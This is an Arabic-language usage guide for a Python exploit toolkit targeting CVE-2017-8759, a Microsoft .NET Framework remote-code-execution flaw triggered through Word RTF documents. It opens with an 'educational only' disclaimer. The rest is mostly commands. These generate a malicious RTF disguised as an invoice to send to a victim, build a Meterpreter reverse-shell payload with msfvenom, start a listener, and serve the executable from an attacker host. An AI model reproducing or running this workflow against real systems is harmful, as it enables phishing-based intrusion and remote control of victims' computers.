
CVE-2017-8759 سكربت استغلال ثغرة مايكروسوفت وورد
أداة استغلال CVE-2017-8759 هي سكربت بايثون مفيد يوفر لمختبر الاختراق والباحثين الأمنيين طريقة سريعة وفعالة لاختبار ثغرة تنفيذ الأوامر عن بعد (RCE) في Microsoft .NET Framework. يمكنها إنشاء ملف RTF ضار وتوصيل بايلود من Metasploit / Meterpreter / غيرها للضحية دون أي تكوين معقد.
هذا البرنامج لأغراض تعليمية فقط. لا تستخدمه بدون إذن. ينطبق إخلاء المسؤولية المعتاد، خاصة حقيقة أنني (bhdresh) غير مسؤول عن أي أضرار ناتجة عن الاستخدام المباشر أو غير المباشر للمعلومات أو الوظائف التي توفرها هذه البرامج. لا يتحمل المؤلف أو أي مزود إنترنت أي مسؤولية عن المحتوى أو سوء استخدام هذه البرامج أو أي مشتقاتها. باستخدام هذا البرنامج فإنك تقبل حقيقة أن أي ضرر (فقدان بيانات، تعطل النظام، اختراق النظام، إلخ) ناتج عن استخدام هذه البرامج ليس مسؤولية bhdresh.
أخيرًا، هذا تطوير شخصي، يرجى احترام فلسفته وعدم استخدامه لأمور سيئة!
تم تقديم الإمكانيات التالية للسكربت
- إنشاء ملف RTF ضار
- وضع الاستغلال للملف RTF المُنشأ
الإصدار: بايثون إصدار 2.7.13
1) إنشاء ملف RTF ضار
# python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (اختياري، إذا كنت تستخدم بايلود MSF): إنشاء بايلود metasploit وبدء المعالج
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) ابدأ الأداة في وضع الاستغلال لتوصيل البايلود المحلي
# python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
# python cve-2017-8759_toolkit.py -h
This is a handy toolkit to exploit CVE-2017-8759 (Microsoft .NET Framework RCE)
Modes:
-M gen Generate Malicious file only
Generate malicious RTF/PPSX file:
-w <Filename.rtf> Name of malicious RTF file (Share this file with victim).
-u <http://attacker.com/test.txt> Path of remote txt file. Normally, this should be a domain or IP where this tool is running.
For example, http://attackerip.com/test.txt (This URL will be included in malicious RTF file and will be requested once victim will open malicious RTF file.
-M exp Start exploitation mode
Exploitation:
-p <TCP port:Default 80> Local port number.
-e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.
-l </tmp/shell.exe> Specify local path of an executable file / meterpreter shell / payload.